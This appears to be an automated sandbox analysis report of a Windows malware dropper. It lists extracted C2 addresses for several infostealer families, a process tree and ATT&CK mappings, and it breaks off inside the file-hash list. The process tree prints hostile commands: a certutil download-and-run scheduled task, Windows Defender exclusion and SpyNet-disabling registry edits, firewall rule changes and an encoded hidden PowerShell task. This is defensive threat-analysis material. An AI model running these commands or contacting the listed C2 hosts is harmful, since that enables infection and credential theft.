Analysis

  • max time kernel
    161s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    10-03-2022 14:03

General

  • Target

    607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe

  • Size

    8.1MB

  • MD5

    113b2c45c756b171c108b8b5d60dc0cb

  • SHA1

    0fdf20b51c4cc246e323ca985fbcd379b4807ab2

  • SHA256

    607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7

  • SHA512

    2401da89351bdc2c58c6b1187194d825f813dbbb023e33996803e265065abc7c623dd80d28540aa1a0127a843e5d82bbdac34464221191a97ef83833dd0c2627

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

UPD

C2

193.56.146.78:51487

Extracted

Family

redline

Botnet

dadad123

C2

86.107.197.196:63065

Attributes
  • auth_value

    dd4834614a3ac04a7b90791c224626a2

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 37 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
    "C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
      2⤵
      • Executes dropped EXE
      PID:768
    • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      2⤵
      • Executes dropped EXE
      PID:1116
    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
      "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      2⤵
      • Executes dropped EXE
      PID:840
    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
      "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1656
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Windows security modification
        • Adds Run key to start application
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            5⤵
            • Modifies data under HKEY_USERS
            PID:1444
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe /202-202
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:308
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            5⤵
            • Creates scheduled task(s)
            PID:1184
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            5⤵
            • Creates scheduled task(s)
            PID:2568
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            5⤵
            • Executes dropped EXE
            PID:2024
    • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
      2⤵
      • Executes dropped EXE
      PID:1376
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im chrome.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im chrome.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1044
    • C:\Users\Admin\AppData\Local\Temp\Files.exe
      "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1200
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
        • Executes dropped EXE
        PID:1876
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
        • Executes dropped EXE
        PID:1996
    • C:\Users\Admin\AppData\Local\Temp\File.exe
      "C:\Users\Admin\AppData\Local\Temp\File.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Users\Admin\Pictures\Adobe Films\eEVu3hUYG3xvmtPZ8eN5X3r6.exe
        "C:\Users\Admin\Pictures\Adobe Films\eEVu3hUYG3xvmtPZ8eN5X3r6.exe"
        3⤵
        • Executes dropped EXE
        PID:1464
      • C:\Users\Admin\Pictures\Adobe Films\9tJIwLeuaxdk_JoJtJ4IawCE.exe
        "C:\Users\Admin\Pictures\Adobe Films\9tJIwLeuaxdk_JoJtJ4IawCE.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:1192
        • C:\Users\Admin\Documents\r3mKgks2grMJIrPR428GJ00d.exe
          "C:\Users\Admin\Documents\r3mKgks2grMJIrPR428GJ00d.exe"
          4⤵
          • Executes dropped EXE
          PID:2852
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2916
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2908
      • C:\Users\Admin\Pictures\Adobe Films\6HSh4Lu6KAVIZEubICHicFTo.exe
        "C:\Users\Admin\Pictures\Adobe Films\6HSh4Lu6KAVIZEubICHicFTo.exe"
        3⤵
        • Executes dropped EXE
        PID:772
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"
          4⤵
            PID:2140
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "
              5⤵
                PID:3000
                • C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe
                  "C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3036
          • C:\Users\Admin\Pictures\Adobe Films\WEQebRcSNauy6Cpuw2THycbD.exe
            "C:\Users\Admin\Pictures\Adobe Films\WEQebRcSNauy6Cpuw2THycbD.exe"
            3⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • Modifies system certificate store
            PID:1544
          • C:\Users\Admin\Pictures\Adobe Films\NwoIpz8newKLP_JbvBqEmObE.exe
            "C:\Users\Admin\Pictures\Adobe Films\NwoIpz8newKLP_JbvBqEmObE.exe"
            3⤵
            • Executes dropped EXE
            PID:476
          • C:\Users\Admin\Pictures\Adobe Films\rN_y9ppu64RkmxKN25ul45dg.exe
            "C:\Users\Admin\Pictures\Adobe Films\rN_y9ppu64RkmxKN25ul45dg.exe"
            3⤵
            • Executes dropped EXE
            PID:1380
          • C:\Users\Admin\Pictures\Adobe Films\ZeLyxOA4x6myxubrySf6Y1C4.exe
            "C:\Users\Admin\Pictures\Adobe Films\ZeLyxOA4x6myxubrySf6Y1C4.exe"
            3⤵
            • Executes dropped EXE
            PID:1948
          • C:\Users\Admin\Pictures\Adobe Films\1zutRQC84YQUeKHjVUlfDZOh.exe
            "C:\Users\Admin\Pictures\Adobe Films\1zutRQC84YQUeKHjVUlfDZOh.exe"
            3⤵
            • Executes dropped EXE
            PID:2076
          • C:\Users\Admin\Pictures\Adobe Films\CtM5aIFdy9l7O2ZzbFQu_T6r.exe
            "C:\Users\Admin\Pictures\Adobe Films\CtM5aIFdy9l7O2ZzbFQu_T6r.exe"
            3⤵
            • Executes dropped EXE
            PID:2128
          • C:\Users\Admin\Pictures\Adobe Films\bbEPjtArMWCNdjrdheBgslis.exe
            "C:\Users\Admin\Pictures\Adobe Films\bbEPjtArMWCNdjrdheBgslis.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2104
            • C:\Users\Admin\AppData\Local\Temp\7zSD3D3.tmp\Install.exe
              .\Install.exe
              4⤵
              • Executes dropped EXE
              PID:2740
              • C:\Users\Admin\AppData\Local\Temp\7zSEAFB.tmp\Install.exe
                .\Install.exe /S /site_id "525403"
                5⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Drops file in System32 directory
                • Enumerates system info in registry
                PID:2944
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  6⤵
                    PID:2752
                    • C:\Windows\SysWOW64\cmd.exe
                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                      7⤵
                        PID:2436
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                          8⤵
                            PID:2464
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                        6⤵
                          PID:2852
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            7⤵
                              PID:2816
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                8⤵
                                  PID:2984
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gUrhsBOxq" /SC once /ST 10:38:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              6⤵
                              • Creates scheduled task(s)
                              PID:2764
                      • C:\Users\Admin\Pictures\Adobe Films\ueYwx1EQ2yqaop1hxO0JLc18.exe
                        "C:\Users\Admin\Pictures\Adobe Films\ueYwx1EQ2yqaop1hxO0JLc18.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:2164
                      • C:\Users\Admin\Pictures\Adobe Films\fIGgIArMNFm5pubwBduQ13bQ.exe
                        "C:\Users\Admin\Pictures\Adobe Films\fIGgIArMNFm5pubwBduQ13bQ.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:2208
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                          4⤵
                            PID:2444
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd
                              5⤵
                                PID:2472
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist /FI "imagename eq BullGuardCore.exe"
                                  6⤵
                                  • Enumerates processes with tasklist
                                  PID:2492
                                • C:\Windows\SysWOW64\find.exe
                                  find /I /N "bullguardcore.exe"
                                  6⤵
                                    PID:2532
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist /FI "imagename eq PSUAService.exe"
                                    6⤵
                                    • Enumerates processes with tasklist
                                    PID:2620
                                  • C:\Windows\SysWOW64\find.exe
                                    find /I /N "psuaservice.exe"
                                    6⤵
                                      PID:2628
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                      6⤵
                                        PID:2724
                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                        Accostarmi.exe.pif N
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2792
                                      • C:\Windows\SysWOW64\waitfor.exe
                                        waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
                                        6⤵
                                          PID:2812
                                  • C:\Users\Admin\Pictures\Adobe Films\bhS_3O82HAabngAzjB0oIpub.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\bhS_3O82HAabngAzjB0oIpub.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2176
                                  • C:\Users\Admin\Pictures\Adobe Films\Yn2D5Jnu3MxWvJFv4qk6iDUo.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\Yn2D5Jnu3MxWvJFv4qk6iDUo.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2232
                                  • C:\Users\Admin\Pictures\Adobe Films\KWRu6SEB9fb1yJgxtHKIYCuY.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\KWRu6SEB9fb1yJgxtHKIYCuY.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2220
                                  • C:\Users\Admin\Pictures\Adobe Films\bfgCQBkJldfvK7hOSpVN1_S0.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\bfgCQBkJldfvK7hOSpVN1_S0.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2352
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      4⤵
                                        PID:548
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:476
                                    • C:\Users\Admin\Pictures\Adobe Films\q1fjC1dHultjKflZL89R3iCI.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\q1fjC1dHultjKflZL89R3iCI.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:2716
                                  • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1800
                                • C:\Windows\system32\makecab.exe
                                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220310150849.log C:\Windows\Logs\CBS\CbsPersist_20220310150849.cab
                                  1⤵
                                  • Drops file in Windows directory
                                  PID:1528
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {51192914-AB94-4353-A0E9-436EB389153C} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
                                  1⤵
                                    PID:2632
                                    • C:\Users\Admin\AppData\Roaming\virgfrf
                                      C:\Users\Admin\AppData\Roaming\virgfrf
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1188

                                  Network

                                  MITRE ATT&CK Matrix ATT&CK v6

                                  Execution

                                  Scheduled Task

                                  1
                                  T1053

                                  Persistence

                                  Modify Existing Service

                                  2
                                  T1031

                                  Registry Run Keys / Startup Folder

                                  1
                                  T1060

                                  Scheduled Task

                                  1
                                  T1053

                                  Privilege Escalation

                                  Scheduled Task

                                  1
                                  T1053

                                  Defense Evasion

                                  Modify Registry

                                  5
                                  T1112

                                  Disabling Security Tools

                                  3
                                  T1089

                                  Install Root Certificate

                                  1
                                  T1130

                                  Credential Access

                                  Credentials in Files

                                  3
                                  T1081

                                  Discovery

                                  Query Registry

                                  6
                                  T1012

                                  System Information Discovery

                                  6
                                  T1082

                                  Peripheral Device Discovery

                                  1
                                  T1120

                                  Process Discovery

                                  1
                                  T1057

                                  Collection

                                  Data from Local System

                                  3
                                  T1005

                                  Command and Control

                                  Web Service

                                  1
                                  T1102

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                    MD5

                                    637481df32351129e60560d5a5c100b5

                                    SHA1

                                    a46aee6e5a4a4893fba5806bcc14fc7fb3ce80ae

                                    SHA256

                                    1f1029d94ca4656a577d554cedd79d447658f475af08620084897a5523587052

                                    SHA512

                                    604bfd0a78a57dfddd45872803501ad89491e37e89e0778b0f13644fa9164ff509955a57469dfdd65a05bbedaf0acb669f68430e84800d17efe7d360a70569e3

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                    MD5

                                    637481df32351129e60560d5a5c100b5

                                    SHA1

                                    a46aee6e5a4a4893fba5806bcc14fc7fb3ce80ae

                                    SHA256

                                    1f1029d94ca4656a577d554cedd79d447658f475af08620084897a5523587052

                                    SHA512

                                    604bfd0a78a57dfddd45872803501ad89491e37e89e0778b0f13644fa9164ff509955a57469dfdd65a05bbedaf0acb669f68430e84800d17efe7d360a70569e3

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    MD5

                                    9157950f1ff03484db4e87188367a5ca

                                    SHA1

                                    5792f2c8bb2d4727746dbfaf3881aaa46d760a94

                                    SHA256

                                    74dbe53fd88435c9e3321916cadedf3614042ed0ba1df3b37cc29434b35c700d

                                    SHA512

                                    df0b904cba72246d8be98b521db606b3da28bb2cc82958ebe04eea9dbb644d4e01ecf844da17df90e2cdb2df70ff7f1c058b3720fd7b103ab2a9c886ccce59e4

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    MD5

                                    9157950f1ff03484db4e87188367a5ca

                                    SHA1

                                    5792f2c8bb2d4727746dbfaf3881aaa46d760a94

                                    SHA256

                                    74dbe53fd88435c9e3321916cadedf3614042ed0ba1df3b37cc29434b35c700d

                                    SHA512

                                    df0b904cba72246d8be98b521db606b3da28bb2cc82958ebe04eea9dbb644d4e01ecf844da17df90e2cdb2df70ff7f1c058b3720fd7b103ab2a9c886ccce59e4

                                  • C:\Users\Admin\AppData\Local\Temp\File.exe
                                    MD5

                                    254199404fccfb91d18c929ce584eef7

                                    SHA1

                                    782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

                                    SHA256

                                    6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

                                    SHA512

                                    a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

                                  • C:\Users\Admin\AppData\Local\Temp\Files.exe
                                    MD5

                                    2d0217e0c70440d8c82883eadea517b9

                                    SHA1

                                    f3b7dd6dbb43b895ba26f67370af99952b7d83cb

                                    SHA256

                                    d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

                                    SHA512

                                    6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

                                  • C:\Users\Admin\AppData\Local\Temp\Files.exe
                                    MD5

                                    2d0217e0c70440d8c82883eadea517b9

                                    SHA1

                                    f3b7dd6dbb43b895ba26f67370af99952b7d83cb

                                    SHA256

                                    d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

                                    SHA512

                                    6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

                                  • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                    MD5

                                    b89068659ca07ab9b39f1c580a6f9d39

                                    SHA1

                                    7e3e246fcf920d1ada06900889d099784fe06aa5

                                    SHA256

                                    9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

                                    SHA512

                                    940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

                                  • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                    MD5

                                    907b8a8bacc5432518151b830339539d

                                    SHA1

                                    9d5a934d1291db04f88482e2c3e5f3053552e044

                                    SHA256

                                    61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                    SHA512

                                    8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                  • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                    MD5

                                    907b8a8bacc5432518151b830339539d

                                    SHA1

                                    9d5a934d1291db04f88482e2c3e5f3053552e044

                                    SHA256

                                    61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                    SHA512

                                    8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                    MD5

                                    921b10ea055eb9c80737b07142de6d2e

                                    SHA1

                                    6c2134159e68c8219a51a5b4dab4da33f2e0bad1

                                    SHA256

                                    f9f6ec4585db7b9e410b685e38f54db289671955dc39ab14a904745418a21350

                                    SHA512

                                    80ae017b10e0ae9190b409efb667891f8c747ec34b236b5fd34e2f8c144da439f237480acc9b44673a82ea8c9ae7c3e3f18bdafc879b6753566ec0615f310130

                                  • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
                                    MD5

                                    e0dc57de2c072d59fadf3d37fb7564c8

                                    SHA1

                                    92aa85d8de4868a9aa9435b46b5b87ce737683e6

                                    SHA256

                                    1d1673f737beed31a720b15d690affc829661853ccf91f74e7c3fdac26910c87

                                    SHA512

                                    d2f0c50ea7fc47d72be986e25c5704bd84fe109b998ef858d2e178d478c4d180e16125885f96e1867690010a3a18ae5a571a5dc1a67de76759475a4efb4ff07d

                                  • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
                                    MD5

                                    e0dc57de2c072d59fadf3d37fb7564c8

                                    SHA1

                                    92aa85d8de4868a9aa9435b46b5b87ce737683e6

                                    SHA256

                                    1d1673f737beed31a720b15d690affc829661853ccf91f74e7c3fdac26910c87

                                    SHA512

                                    d2f0c50ea7fc47d72be986e25c5704bd84fe109b998ef858d2e178d478c4d180e16125885f96e1867690010a3a18ae5a571a5dc1a67de76759475a4efb4ff07d

                                  • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
                                    MD5

                                    c7d966011247c4d60b35dde95d5dc7b1

                                    SHA1

                                    510b8858e6b69c8af57bcf2f88627bccb269d0dd

                                    SHA256

                                    7f2e86caeaa4a0620410067957d8d140882cb320c4e98caf70d5d3815b50a390

                                    SHA512

                                    50fd7aa7865a4e6015a8ef3c4bac5bf1104540e3bdc854ef2bf31d39c3b361857a473e3e4fe5ac1886a7ad5d77da235753ed33ec6b97c449932af53b15522c77

                                  • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    MD5

                                    b7161c0845a64ff6d7345b67ff97f3b0

                                    SHA1

                                    d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                    SHA256

                                    fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                    SHA512

                                    98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    MD5

